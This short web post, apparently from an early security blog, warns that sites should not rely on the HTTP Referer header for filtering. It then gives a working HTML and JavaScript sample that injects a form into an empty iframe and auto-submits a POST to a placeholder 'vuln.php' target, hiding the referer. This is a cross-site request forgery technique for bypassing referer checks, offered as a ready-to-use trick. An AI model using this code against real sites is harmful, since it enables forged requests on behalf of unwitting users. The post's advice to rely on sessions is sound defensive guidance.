|
Many websites look at the REFERER property of header to detect where you coming from and then do their filtering. This is really a bad idea to Count on REFERER property, always use Session for filtering.
in javascript we use document.referer to detect the Referer.
in Asp its Request.ServerVariables("HTTP_REFERER")
So how do you hide the Referer so target site cannot read your referer?
Easy, just create a IFrame without SRC attribute and have javaScript populate a From within Iframe and Submit the form using onload event. Below is Sample:
<html>
<body>
<script>
function doit()
{
var html;
html = '<form action="http://somesite.com/vuln.php" method="post" name="fname">'
+'<input type = "text" name = "SOME_FIELD" value = "ARBITRARY VALUE">'
+'</form>';
window.frames["frm"].document.body.innerHTML = html;
window.frames["frm"].document.fname.submit();
}
</script>
<iframe name="frm" onload="doit()"></iframe>
</body>
</html>
Orignal Source:http://own-the.net/news_Hide-referer-tested-on-IE-and-FF_4.html
|